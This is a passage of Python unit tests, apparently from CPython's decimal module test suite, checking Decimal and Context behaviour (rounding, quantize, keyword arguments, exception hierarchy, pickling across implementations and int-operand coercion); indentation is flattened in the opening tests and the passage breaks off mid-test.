self.assertTrue(MyDecimal.from_float(float('-inf')).is_infinite())
self.assertEqual(str(MyDecimal.from_float(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(MyDecimal.from_float(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(MyDecimal.from_float(float('-inf'))),
str(Decimal('-Infinity')))
self.assertRaises(TypeError, MyDecimal.from_float, 'abc')
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(MyDecimal.from_float(x))) # roundtrip
def test_create_decimal_from_float(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
context = Context(prec=5, rounding=ROUND_DOWN)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1415')
)
context = Context(prec=5, rounding=ROUND_UP)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1416')
)
context = Context(prec=5, traps=[Inexact])
self.assertRaises(
Inexact,
context.create_decimal_from_float,
math.pi
)
self.assertEqual(repr(context.create_decimal_from_float(-0.0)),
"Decimal('-0')")
self.assertEqual(repr(context.create_decimal_from_float(1.0)),
"Decimal('1')")
self.assertEqual(repr(context.create_decimal_from_float(10)),
"Decimal('10')")
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
c = Context(Emax=99999, Emin=-99999)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01')),
Decimal('7.34')
)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01'), rounding=ROUND_DOWN),
Decimal('7.33')
)
self.assertRaises(
InvalidOperation,
Decimal("10e99999").quantize, Decimal('1e100000'), context=c
)
c = Context()
d = Decimal("0.871831e800")
x = d.quantize(context=c, exp=Decimal("1e797"), rounding=ROUND_DOWN)
self.assertEqual(x, Decimal('8.71E+799'))
def test_complex(self):
Decimal = self.decimal.Decimal
x = Decimal("9.8182731e181273")
self.assertEqual(x.real, x)
self.assertEqual(x.imag, 0)
self.assertEqual(x.conjugate(), x)
x = Decimal("1")
self.assertEqual(complex(x), complex(float(1)))
self.assertRaises(AttributeError, setattr, x, 'real', 100)
self.assertRaises(AttributeError, setattr, x, 'imag', 100)
self.assertRaises(AttributeError, setattr, x, 'conjugate', 100)
self.assertRaises(AttributeError, setattr, x, '__complex__', 100)
def test_named_parameters(self):
    """Operations must accept operands and context as keyword arguments;
    errors raised with an explicit context must set that context's
    flags, not the thread context's."""
    D = self.decimal.Decimal
    Context = self.decimal.Context
    localcontext = self.decimal.localcontext
    InvalidOperation = self.decimal.InvalidOperation
    Overflow = self.decimal.Overflow

    # A deliberately tiny explicit context so operations round/overflow.
    xc = Context()
    xc.prec = 1
    xc.Emax = 1
    xc.Emin = -1

    with localcontext() as c:
        c.clear_flags()

        self.assertEqual(D(9, xc), 9)
        self.assertEqual(D(9, context=xc), 9)
        self.assertEqual(D(context=xc, value=9), 9)
        self.assertEqual(D(context=xc), 0)
        xc.clear_flags()
        self.assertRaises(InvalidOperation, D, "xyz", context=xc)
        self.assertTrue(xc.flags[InvalidOperation])
        self.assertFalse(c.flags[InvalidOperation])

        xc.clear_flags()
        self.assertEqual(D(2).exp(context=xc), 7)
        self.assertRaises(Overflow, D(8).exp, context=xc)
        self.assertTrue(xc.flags[Overflow])
        self.assertFalse(c.flags[Overflow])

        xc.clear_flags()
        self.assertEqual(D(2).ln(context=xc), D('0.7'))
        self.assertRaises(InvalidOperation, D(-1).ln, context=xc)
        self.assertTrue(xc.flags[InvalidOperation])
        self.assertFalse(c.flags[InvalidOperation])

        self.assertEqual(D(0).log10(context=xc), D('-inf'))
        self.assertEqual(D(-1).next_minus(context=xc), -2)
        self.assertEqual(D(-1).next_plus(context=xc), D('-0.9'))
        self.assertEqual(D("9.73").normalize(context=xc), D('1E+1'))
        self.assertEqual(D("9999").to_integral(context=xc), 9999)
        self.assertEqual(D("-2000").to_integral_exact(context=xc), -2000)
        self.assertEqual(D("123").to_integral_value(context=xc), 123)
        self.assertEqual(D("0.0625").sqrt(context=xc), D('0.2'))

        self.assertEqual(D("0.0625").compare(context=xc, other=3), -1)
        xc.clear_flags()
        self.assertRaises(InvalidOperation,
                          D("0").compare_signal, D('nan'), context=xc)
        self.assertTrue(xc.flags[InvalidOperation])
        self.assertFalse(c.flags[InvalidOperation])
        # NOTE(review): the next assertion appears twice in the original
        # suite; the duplicate is retained unchanged.
        self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
        self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
        self.assertEqual(D("0.2").max_mag(D('-0.3'), context=xc),
                         D('-0.3'))
        self.assertEqual(D("0.02").min(D('-0.03'), context=xc), D('-0.0'))
        self.assertEqual(D("0.02").min_mag(D('-0.03'), context=xc),
                         D('0.0'))
        self.assertEqual(D("0.2").next_toward(D('-1'), context=xc), D('0.1'))
        xc.clear_flags()
        self.assertRaises(InvalidOperation,
                          D("0.2").quantize, D('1e10'), context=xc)
        self.assertTrue(xc.flags[InvalidOperation])
        self.assertFalse(c.flags[InvalidOperation])
        self.assertEqual(D("9.99").remainder_near(D('1.5'), context=xc),
                         D('-0.5'))

        self.assertEqual(D("9.9").fma(third=D('0.9'), context=xc, other=7),
                         D('7E+1'))

        # The boolean predicates take no context argument at all.
        self.assertRaises(TypeError, D(1).is_canonical, context=xc)
        self.assertRaises(TypeError, D(1).is_finite, context=xc)
        self.assertRaises(TypeError, D(1).is_infinite, context=xc)
        self.assertRaises(TypeError, D(1).is_nan, context=xc)
        self.assertRaises(TypeError, D(1).is_qnan, context=xc)
        self.assertRaises(TypeError, D(1).is_snan, context=xc)
        self.assertRaises(TypeError, D(1).is_signed, context=xc)
        self.assertRaises(TypeError, D(1).is_zero, context=xc)

        # is_normal/is_subnormal DO take a context (Emin matters).
        self.assertFalse(D("0.01").is_normal(context=xc))
        self.assertTrue(D("0.01").is_subnormal(context=xc))

        self.assertRaises(TypeError, D(1).adjusted, context=xc)
        self.assertRaises(TypeError, D(1).conjugate, context=xc)
        self.assertRaises(TypeError, D(1).radix, context=xc)

        self.assertEqual(D(-111).logb(context=xc), 2)
        self.assertEqual(D(0).logical_invert(context=xc), 1)
        self.assertEqual(D('0.01').number_class(context=xc), '+Subnormal')
        self.assertEqual(D('0.21').to_eng_string(context=xc), '0.21')

        self.assertEqual(D('11').logical_and(D('10'), context=xc), 0)
        self.assertEqual(D('11').logical_or(D('10'), context=xc), 1)
        self.assertEqual(D('01').logical_xor(D('10'), context=xc), 1)
        # NOTE(review): duplicated assertion retained from the original.
        self.assertEqual(D('23').rotate(1, context=xc), 3)
        self.assertEqual(D('23').rotate(1, context=xc), 3)
        xc.clear_flags()
        self.assertRaises(Overflow,
                          D('23').scaleb, 1, context=xc)
        self.assertTrue(xc.flags[Overflow])
        self.assertFalse(c.flags[Overflow])
        self.assertEqual(D('23').shift(-1, context=xc), 0)

        self.assertRaises(TypeError, D.from_float, 1.1, context=xc)
        self.assertRaises(TypeError, D(0).as_tuple, context=xc)
        self.assertEqual(D(1).canonical(), 1)
        self.assertRaises(TypeError, D("-1").copy_abs, context=xc)
        self.assertRaises(TypeError, D("-1").copy_negate, context=xc)
        self.assertRaises(TypeError, D(1).canonical, context="x")
        self.assertRaises(TypeError, D(1).canonical, xyz="x")
def test_exception_hierarchy(self):
decimal = self.decimal
DecimalException = decimal.DecimalException
InvalidOperation = decimal.InvalidOperation
FloatOperation = decimal.FloatOperation
DivisionByZero = decimal.DivisionByZero
Overflow = decimal.Overflow
Underflow = decimal.Underflow
Subnormal = decimal.Subnormal
Inexact = decimal.Inexact
Rounded = decimal.Rounded
Clamped = decimal.Clamped
self.assertTrue(issubclass(DecimalException, ArithmeticError))
self.assertTrue(issubclass(InvalidOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, TypeError))
self.assertTrue(issubclass(DivisionByZero, DecimalException))
self.assertTrue(issubclass(DivisionByZero, ZeroDivisionError))
self.assertTrue(issubclass(Overflow, Rounded))
self.assertTrue(issubclass(Overflow, Inexact))
self.assertTrue(issubclass(Overflow, DecimalException))
self.assertTrue(issubclass(Underflow, Inexact))
self.assertTrue(issubclass(Underflow, Rounded))
self.assertTrue(issubclass(Underflow, Subnormal))
self.assertTrue(issubclass(Underflow, DecimalException))
self.assertTrue(issubclass(Subnormal, DecimalException))
self.assertTrue(issubclass(Inexact, DecimalException))
self.assertTrue(issubclass(Rounded, DecimalException))
self.assertTrue(issubclass(Clamped, DecimalException))
self.assertTrue(issubclass(decimal.ConversionSyntax, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionImpossible, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, ZeroDivisionError))
self.assertTrue(issubclass(decimal.InvalidContext, InvalidOperation))
class CPythonAPItests(PythonAPItests):
    # Run the Python-API tests against the C accelerator (_decimal).
    decimal = C
class PyPythonAPItests(PythonAPItests):
    # Run the Python-API tests against the pure-Python implementation.
    decimal = P
class ContextAPItests(unittest.TestCase):
    # Tests for the Context API; subclasses set `decimal` to either
    # the C or the pure-Python implementation.

    def test_none_args(self):
        # Passing None for every Context() argument must produce the
        # same defaults as passing no arguments at all.
        Context = self.decimal.Context
        InvalidOperation = self.decimal.InvalidOperation
        DivisionByZero = self.decimal.DivisionByZero
        Overflow = self.decimal.Overflow

        c1 = Context()
        c2 = Context(prec=None, rounding=None, Emax=None, Emin=None,
                     capitals=None, clamp=None, flags=None, traps=None)
        for c in [c1, c2]:
            self.assertEqual(c.prec, 28)
            self.assertEqual(c.rounding, ROUND_HALF_EVEN)
            self.assertEqual(c.Emax, 999999)
            self.assertEqual(c.Emin, -999999)
            self.assertEqual(c.capitals, 1)
            self.assertEqual(c.clamp, 0)
            # assert_signals is a test-suite helper comparing the
            # flag/trap dictionaries against an expected signal list.
            assert_signals(self, c, 'flags', [])
            assert_signals(self, c, 'traps', [InvalidOperation, DivisionByZero,
                                              Overflow])
@cpython_only
def test_from_legacy_strings(self):
    # Context.rounding must accept legacy (non-canonical) unicode
    # string objects, but reject the empty string and strings with
    # embedded NUL characters.
    import _testcapi
    c = self.decimal.Context()

    for rnd in RoundingModes:
        c.rounding = _testcapi.unicode_legacy_string(rnd)
        self.assertEqual(c.rounding, rnd)

    s = _testcapi.unicode_legacy_string('')
    self.assertRaises(TypeError, setattr, c, 'rounding', s)

    s = _testcapi.unicode_legacy_string('ROUND_\x00UP')
    self.assertRaises(TypeError, setattr, c, 'rounding', s)
def test_pickle(self):
    """Contexts must pickle under every protocol, and pickles must be
    interchangeable between the C and Python implementations."""
    for proto in range(pickle.HIGHEST_PROTOCOL + 1):
        Context = self.decimal.Context
        savedecimal = sys.modules['decimal']

        # Round trip within a single implementation.
        sys.modules['decimal'] = self.decimal
        c = Context()
        e = pickle.loads(pickle.dumps(c, proto))
        self.assertEqual(c.prec, e.prec)
        self.assertEqual(c.Emin, e.Emin)
        self.assertEqual(c.Emax, e.Emax)
        self.assertEqual(c.rounding, e.rounding)
        self.assertEqual(c.capitals, e.capitals)
        self.assertEqual(c.clamp, e.clamp)
        self.assertEqual(c.flags, e.flags)
        self.assertEqual(c.traps, e.traps)

        # Test interchangeability: dump with one implementation
        # installed as `decimal`, load with the other, over randomized
        # context settings and every flags/traps prefix combination.
        combinations = [(C, P), (P, C)] if C else [(P, P)]
        for dumper, loader in combinations:
            for ri, _ in enumerate(RoundingModes):
                for fi, _ in enumerate(OrderedSignals[dumper]):
                    for ti, _ in enumerate(OrderedSignals[dumper]):
                        prec = random.randrange(1, 100)
                        emin = random.randrange(-100, 0)
                        emax = random.randrange(1, 100)
                        caps = random.randrange(2)
                        clamp = random.randrange(2)

                        # One module dumps
                        sys.modules['decimal'] = dumper
                        c = dumper.Context(
                            prec=prec, Emin=emin, Emax=emax,
                            rounding=RoundingModes[ri],
                            capitals=caps, clamp=clamp,
                            flags=OrderedSignals[dumper][:fi],
                            traps=OrderedSignals[dumper][:ti]
                        )
                        s = pickle.dumps(c, proto)

                        # The other module loads
                        sys.modules['decimal'] = loader
                        d = pickle.loads(s)
                        self.assertIsInstance(d, loader.Context)

                        self.assertEqual(d.prec, prec)
                        self.assertEqual(d.Emin, emin)
                        self.assertEqual(d.Emax, emax)
                        self.assertEqual(d.rounding, RoundingModes[ri])
                        self.assertEqual(d.capitals, caps)
                        self.assertEqual(d.clamp, clamp)
                        assert_signals(self, d, 'flags', OrderedSignals[loader][:fi])
                        assert_signals(self, d, 'traps', OrderedSignals[loader][:ti])

        # Restore whichever module was installed before the test.
        sys.modules['decimal'] = savedecimal
def test_equality_with_other_types(self):
    # Decimal equality participates in container membership checks
    # even among unrelated types.
    Decimal = self.decimal.Decimal
    others = ['a', 1.0, (1,2), {}]
    self.assertIn(Decimal(10), others[:2] + [Decimal(10)] + others[2:])
    self.assertNotIn(Decimal(10), others)
def test_copy(self):
    # Context.copy() must be deep: the flags and traps dicts are
    # fresh objects holding the same keys and values.
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context

    original = Context()
    duplicate = original.copy()
    self.assertNotEqual(id(original), id(duplicate))
    self.assertNotEqual(id(original.flags), id(duplicate.flags))
    self.assertNotEqual(id(original.traps), id(duplicate.traps))
    self.assertEqual(set(original.flags.keys()),
                     set(duplicate.flags.keys()))
    self.assertEqual(original.flags, duplicate.flags)
def test__clamp(self):
    # In Python 3.2, the private attribute `_clamp` was made
    # public (issue 8540), with the old `_clamp` becoming a
    # property wrapping `clamp`.  For the duration of Python 3.2
    # only, the attribute should be gettable/settable via both
    # `clamp` and `_clamp`; in Python 3.3, `_clamp` should be
    # removed.
    # This test checks that the removal has happened: `_clamp`
    # no longer exists on Context at all.
    Context = self.decimal.Context
    c = Context()
    self.assertRaises(AttributeError, getattr, c, '_clamp')
def test_abs(self):
    # Context.abs coerces an int operand; strings are rejected.
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context
    ctx = Context()
    expected = ctx.abs(Decimal(-1))
    self.assertEqual(ctx.abs(-1), expected)
    self.assertRaises(TypeError, ctx.abs, '-1')
def test_add(self):
    # Context.add coerces int operands on either side; strings fail.
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context
    ctx = Context()
    expected = ctx.add(Decimal(1), Decimal(1))
    for lhs, rhs in ((1, 1), (Decimal(1), 1), (1, Decimal(1))):
        self.assertEqual(ctx.add(lhs, rhs), expected)
    self.assertRaises(TypeError, ctx.add, '1', 1)
    self.assertRaises(TypeError, ctx.add, 1, '1')
def test_compare(self):
    # Context.compare coerces int operands on either side; strings fail.
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context
    ctx = Context()
    expected = ctx.compare(Decimal(1), Decimal(1))
    for lhs, rhs in ((1, 1), (Decimal(1), 1), (1, Decimal(1))):
        self.assertEqual(ctx.compare(lhs, rhs), expected)
    self.assertRaises(TypeError, ctx.compare, '1', 1)
    self.assertRaises(TypeError, ctx.compare, 1, '1')
def test_compare_signal(self):
    # compare_signal coerces int operands on either side; strings fail.
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context
    ctx = Context()
    expected = ctx.compare_signal(Decimal(1), Decimal(1))
    for lhs, rhs in ((1, 1), (Decimal(1), 1), (1, Decimal(1))):
        self.assertEqual(ctx.compare_signal(lhs, rhs), expected)
    self.assertRaises(TypeError, ctx.compare_signal, '1', 1)
    self.assertRaises(TypeError, ctx.compare_signal, 1, '1')
def test_compare_total(self):
    # compare_total coerces int operands on either side; strings fail.
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context
    ctx = Context()
    expected = ctx.compare_total(Decimal(1), Decimal(1))
    for lhs, rhs in ((1, 1), (Decimal(1), 1), (1, Decimal(1))):
        self.assertEqual(ctx.compare_total(lhs, rhs), expected)
    self.assertRaises(TypeError, ctx.compare_total, '1', 1)
    self.assertRaises(TypeError, ctx.compare_total, 1, '1')
def test_compare_total_mag(self):
    # compare_total_mag coerces int operands; strings are rejected.
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context
    ctx = Context()
    expected = ctx.compare_total_mag(Decimal(1), Decimal(1))
    for lhs, rhs in ((1, 1), (Decimal(1), 1), (1, Decimal(1))):
        self.assertEqual(ctx.compare_total_mag(lhs, rhs), expected)
    self.assertRaises(TypeError, ctx.compare_total_mag, '1', 1)
    self.assertRaises(TypeError, ctx.compare_total_mag, 1, '1')
def test_copy_abs(self):
    # copy_abs coerces an int operand; strings are rejected.
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context
    ctx = Context()
    expected = ctx.copy_abs(Decimal(-1))
    self.assertEqual(ctx.copy_abs(-1), expected)
    self.assertRaises(TypeError, ctx.copy_abs, '-1')
def test_copy_decimal(self):
    # copy_decimal coerces an int operand; strings are rejected.
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context
    ctx = Context()
    expected = ctx.copy_decimal(Decimal(-1))
    self.assertEqual(ctx.copy_decimal(-1), expected)
    self.assertRaises(TypeError, ctx.copy_decimal, '-1')
def test_copy_negate(self):
    # copy_negate coerces an int operand; strings are rejected.
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context
    ctx = Context()
    expected = ctx.copy_negate(Decimal(-1))
    self.assertEqual(ctx.copy_negate(-1), expected)
    self.assertRaises(TypeError, ctx.copy_negate, '-1')
def test_copy_sign(self):
    # copy_sign coerces int operands on either side; strings fail.
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context
    ctx = Context()
    expected = ctx.copy_sign(Decimal(1), Decimal(-2))
    for lhs, rhs in ((1, -2), (Decimal(1), -2), (1, Decimal(-2))):
        self.assertEqual(ctx.copy_sign(lhs, rhs), expected)
    self.assertRaises(TypeError, ctx.copy_sign, '1', -2)
    self.assertRaises(TypeError, ctx.copy_sign, 1, '-2')
def test_divide(self):
    # Context.divide coerces int operands on either side; strings fail.
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context
    ctx = Context()
    expected = ctx.divide(Decimal(1), Decimal(2))
    for lhs, rhs in ((1, 2), (Decimal(1), 2), (1, Decimal(2))):
        self.assertEqual(ctx.divide(lhs, rhs), expected)
    self.assertRaises(TypeError, ctx.divide, '1', 2)
    self.assertRaises(TypeError, ctx.divide, 1, '2')
def test_divide_int(self):
    # divide_int coerces int operands on either side; strings fail.
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context
    ctx = Context()
    expected = ctx.divide_int(Decimal(1), Decimal(2))
    for lhs, rhs in ((1, 2), (Decimal(1), 2), (1, Decimal(2))):
        self.assertEqual(ctx.divide_int(lhs, rhs), expected)
    self.assertRaises(TypeError, ctx.divide_int, '1', 2)
    self.assertRaises(TypeError, ctx.divide_int, 1, '2')
def test_divmod(self):
    # Context.divmod coerces int operands on either side; strings fail.
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context
    ctx = Context()
    expected = ctx.divmod(Decimal(1), Decimal(2))
    for lhs, rhs in ((1, 2), (Decimal(1), 2), (1, Decimal(2))):
        self.assertEqual(ctx.divmod(lhs, rhs), expected)
    self.assertRaises(TypeError, ctx.divmod, '1', 2)
    self.assertRaises(TypeError, ctx.divmod, 1, '2')
def test_exp(self):
    # Context.exp coerces an int operand; strings are rejected.
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context
    ctx = Context()
    expected = ctx.exp(Decimal(10))
    self.assertEqual(ctx.exp(10), expected)
    self.assertRaises(TypeError, ctx.exp, '10')
def test_fma(self):
    # Context.fma coerces ints in any operand position; strings and
    # floats are rejected (issue 12079 covers the third operand).
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context
    ctx = Context()
    expected = ctx.fma(Decimal(2), Decimal(3), Decimal(4))
    for a, b, z in ((2, 3, 4),
                    (Decimal(2), 3, 4),
                    (2, Decimal(3), 4),
                    (2, 3, Decimal(4)),
                    (Decimal(2), Decimal(3), 4)):
        self.assertEqual(ctx.fma(a, b, z), expected)
    self.assertRaises(TypeError, ctx.fma, '2', 3, 4)
    self.assertRaises(TypeError, ctx.fma, 2, '3', 4)
    self.assertRaises(TypeError, ctx.fma, 2, 3, '4')

    # Issue 12079 for Context.fma ...
    self.assertRaises(TypeError, ctx.fma,
                      Decimal('Infinity'), Decimal(0), "not a decimal")
    self.assertRaises(TypeError, ctx.fma,
                      Decimal(1), Decimal('snan'), 1.222)
    # ... and for Decimal.fma.
    self.assertRaises(TypeError, Decimal('Infinity').fma,
                      Decimal(0), "not a decimal")
    self.assertRaises(TypeError, Decimal(1).fma,
                      Decimal('snan'), 1.222)
def test_is_finite(self):
    # Context.is_finite coerces an int operand; strings are rejected.
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context
    ctx = Context()
    expected = ctx.is_finite(Decimal(10))
    self.assertEqual(ctx.is_finite(10), expected)
    self.assertRaises(TypeError, ctx.is_finite, '10')
def test_is_infinite(self):
    # is_infinite coerces an int operand; strings are rejected.
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context
    ctx = Context()
    expected = ctx.is_infinite(Decimal(10))
    self.assertEqual(ctx.is_infinite(10), expected)
    self.assertRaises(TypeError, ctx.is_infinite, '10')
def test_is_nan(self):
    # Context.is_nan coerces an int operand; strings are rejected.
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context
    ctx = Context()
    expected = ctx.is_nan(Decimal(10))
    self.assertEqual(ctx.is_nan(10), expected)
    self.assertRaises(TypeError, ctx.is_nan, '10')
def test_is_normal(self):
    # Context.is_normal coerces an int operand; strings are rejected.
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context
    ctx = Context()
    expected = ctx.is_normal(Decimal(10))
    self.assertEqual(ctx.is_normal(10), expected)
    self.assertRaises(TypeError, ctx.is_normal, '10')
def test_is_qnan(self):
    # Context.is_qnan coerces an int operand; strings are rejected.
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context
    ctx = Context()
    expected = ctx.is_qnan(Decimal(10))
    self.assertEqual(ctx.is_qnan(10), expected)
    self.assertRaises(TypeError, ctx.is_qnan, '10')
def test_is_signed(self):
    """Context.is_signed accepts an int; a str argument raises TypeError."""
    dec = self.decimal
    ctx = dec.Context()
    want = ctx.is_signed(dec.Decimal(10))
    self.assertEqual(ctx.is_signed(10), want)
    self.assertRaises(TypeError, ctx.is_signed, '10')
def test_is_snan(self):
    """Context.is_snan accepts an int; a str argument raises TypeError."""
    dec = self.decimal
    ctx = dec.Context()
    want = ctx.is_snan(dec.Decimal(10))
    self.assertEqual(ctx.is_snan(10), want)
    self.assertRaises(TypeError, ctx.is_snan, '10')
def test_is_subnormal(self):
    """Context.is_subnormal accepts an int; a str argument raises TypeError."""
    dec = self.decimal
    ctx = dec.Context()
    want = ctx.is_subnormal(dec.Decimal(10))
    self.assertEqual(ctx.is_subnormal(10), want)
    self.assertRaises(TypeError, ctx.is_subnormal, '10')
def test_is_zero(self):
    """Context.is_zero accepts an int; a str argument raises TypeError."""
    dec = self.decimal
    ctx = dec.Context()
    want = ctx.is_zero(dec.Decimal(10))
    self.assertEqual(ctx.is_zero(10), want)
    self.assertRaises(TypeError, ctx.is_zero, '10')
def test_ln(self):
    """Context.ln accepts an int; a str argument raises TypeError."""
    dec = self.decimal
    ctx = dec.Context()
    want = ctx.ln(dec.Decimal(10))
    self.assertEqual(ctx.ln(10), want)
    self.assertRaises(TypeError, ctx.ln, '10')
def test_log10(self):
    """Context.log10 accepts an int; a str argument raises TypeError."""
    dec = self.decimal
    ctx = dec.Context()
    want = ctx.log10(dec.Decimal(10))
    self.assertEqual(ctx.log10(10), want)
    self.assertRaises(TypeError, ctx.log10, '10')
def test_logb(self):
    """Context.logb accepts an int; a str argument raises TypeError."""
    dec = self.decimal
    ctx = dec.Context()
    want = ctx.logb(dec.Decimal(10))
    self.assertEqual(ctx.logb(10), want)
    self.assertRaises(TypeError, ctx.logb, '10')
def test_logical_and(self):
    """Context.logical_and coerces int operands like Decimal operands."""
    dec = self.decimal
    Decimal = dec.Decimal
    ctx = dec.Context()
    want = ctx.logical_and(Decimal(1), Decimal(1))
    for a, b in ((1, 1), (Decimal(1), 1), (1, Decimal(1))):
        self.assertEqual(ctx.logical_and(a, b), want)
    self.assertRaises(TypeError, ctx.logical_and, '1', 1)
    self.assertRaises(TypeError, ctx.logical_and, 1, '1')
def test_logical_invert(self):
    """Context.logical_invert accepts an int; a str argument raises."""
    dec = self.decimal
    ctx = dec.Context()
    want = ctx.logical_invert(dec.Decimal(1000))
    self.assertEqual(ctx.logical_invert(1000), want)
    self.assertRaises(TypeError, ctx.logical_invert, '1000')
def test_logical_or(self):
    """Context.logical_or coerces int operands like Decimal operands."""
    dec = self.decimal
    Decimal = dec.Decimal
    ctx = dec.Context()
    want = ctx.logical_or(Decimal(1), Decimal(1))
    for a, b in ((1, 1), (Decimal(1), 1), (1, Decimal(1))):
        self.assertEqual(ctx.logical_or(a, b), want)
    self.assertRaises(TypeError, ctx.logical_or, '1', 1)
    self.assertRaises(TypeError, ctx.logical_or, 1, '1')
def test_logical_xor(self):
    """Context.logical_xor coerces int operands like Decimal operands."""
    dec = self.decimal
    Decimal = dec.Decimal
    ctx = dec.Context()
    want = ctx.logical_xor(Decimal(1), Decimal(1))
    for a, b in ((1, 1), (Decimal(1), 1), (1, Decimal(1))):
        self.assertEqual(ctx.logical_xor(a, b), want)
    self.assertRaises(TypeError, ctx.logical_xor, '1', 1)
    self.assertRaises(TypeError, ctx.logical_xor, 1, '1')
def test_max(self):
    """Context.max coerces int operands like Decimal operands."""
    dec = self.decimal
    Decimal = dec.Decimal
    ctx = dec.Context()
    want = ctx.max(Decimal(1), Decimal(2))
    for a, b in ((1, 2), (Decimal(1), 2), (1, Decimal(2))):
        self.assertEqual(ctx.max(a, b), want)
    self.assertRaises(TypeError, ctx.max, '1', 2)
    self.assertRaises(TypeError, ctx.max, 1, '2')
def test_max_mag(self):
    """Context.max_mag coerces int operands like Decimal operands."""
    dec = self.decimal
    Decimal = dec.Decimal
    ctx = dec.Context()
    want = ctx.max_mag(Decimal(1), Decimal(2))
    for a, b in ((1, 2), (Decimal(1), 2), (1, Decimal(2))):
        self.assertEqual(ctx.max_mag(a, b), want)
    self.assertRaises(TypeError, ctx.max_mag, '1', 2)
    self.assertRaises(TypeError, ctx.max_mag, 1, '2')
def test_min(self):
    """Context.min coerces int operands like Decimal operands."""
    dec = self.decimal
    Decimal = dec.Decimal
    ctx = dec.Context()
    want = ctx.min(Decimal(1), Decimal(2))
    for a, b in ((1, 2), (Decimal(1), 2), (1, Decimal(2))):
        self.assertEqual(ctx.min(a, b), want)
    self.assertRaises(TypeError, ctx.min, '1', 2)
    self.assertRaises(TypeError, ctx.min, 1, '2')
def test_min_mag(self):
    """Context.min_mag coerces int operands like Decimal operands."""
    dec = self.decimal
    Decimal = dec.Decimal
    ctx = dec.Context()
    want = ctx.min_mag(Decimal(1), Decimal(2))
    for a, b in ((1, 2), (Decimal(1), 2), (1, Decimal(2))):
        self.assertEqual(ctx.min_mag(a, b), want)
    self.assertRaises(TypeError, ctx.min_mag, '1', 2)
    self.assertRaises(TypeError, ctx.min_mag, 1, '2')
def test_minus(self):
    """Context.minus accepts an int; a str argument raises TypeError."""
    dec = self.decimal
    ctx = dec.Context()
    want = ctx.minus(dec.Decimal(10))
    self.assertEqual(ctx.minus(10), want)
    self.assertRaises(TypeError, ctx.minus, '10')
def test_multiply(self):
    """Context.multiply coerces int operands like Decimal operands."""
    dec = self.decimal
    Decimal = dec.Decimal
    ctx = dec.Context()
    want = ctx.multiply(Decimal(1), Decimal(2))
    for a, b in ((1, 2), (Decimal(1), 2), (1, Decimal(2))):
        self.assertEqual(ctx.multiply(a, b), want)
    self.assertRaises(TypeError, ctx.multiply, '1', 2)
    self.assertRaises(TypeError, ctx.multiply, 1, '2')
def test_next_minus(self):
    """Context.next_minus accepts an int; a str argument raises TypeError."""
    dec = self.decimal
    ctx = dec.Context()
    want = ctx.next_minus(dec.Decimal(10))
    self.assertEqual(ctx.next_minus(10), want)
    self.assertRaises(TypeError, ctx.next_minus, '10')
def test_next_plus(self):
    """Context.next_plus accepts an int; a str argument raises TypeError."""
    dec = self.decimal
    ctx = dec.Context()
    want = ctx.next_plus(dec.Decimal(10))
    self.assertEqual(ctx.next_plus(10), want)
    self.assertRaises(TypeError, ctx.next_plus, '10')
def test_next_toward(self):
    """Context.next_toward coerces int operands like Decimal operands."""
    dec = self.decimal
    Decimal = dec.Decimal
    ctx = dec.Context()
    want = ctx.next_toward(Decimal(1), Decimal(2))
    for a, b in ((1, 2), (Decimal(1), 2), (1, Decimal(2))):
        self.assertEqual(ctx.next_toward(a, b), want)
    self.assertRaises(TypeError, ctx.next_toward, '1', 2)
    self.assertRaises(TypeError, ctx.next_toward, 1, '2')
def test_normalize(self):
    """Context.normalize accepts an int; a str argument raises TypeError."""
    dec = self.decimal
    ctx = dec.Context()
    want = ctx.normalize(dec.Decimal(10))
    self.assertEqual(ctx.normalize(10), want)
    self.assertRaises(TypeError, ctx.normalize, '10')
def test_number_class(self):
    """Context.number_class gives the same class for ints and Decimals."""
    dec = self.decimal
    ctx = dec.Context()
    for value in (123, 0, -45):
        self.assertEqual(ctx.number_class(value),
                         ctx.number_class(dec.Decimal(value)))
def test_plus(self):
    """Context.plus accepts an int; a str argument raises TypeError."""
    dec = self.decimal
    ctx = dec.Context()
    want = ctx.plus(dec.Decimal(10))
    self.assertEqual(ctx.plus(10), want)
    self.assertRaises(TypeError, ctx.plus, '10')
def test_power(self):
    """Context.power: mixed operands, bad types, and the keyword/modulo form."""
    dec = self.decimal
    Decimal = dec.Decimal
    ctx = dec.Context()
    want = ctx.power(Decimal(1), Decimal(4))
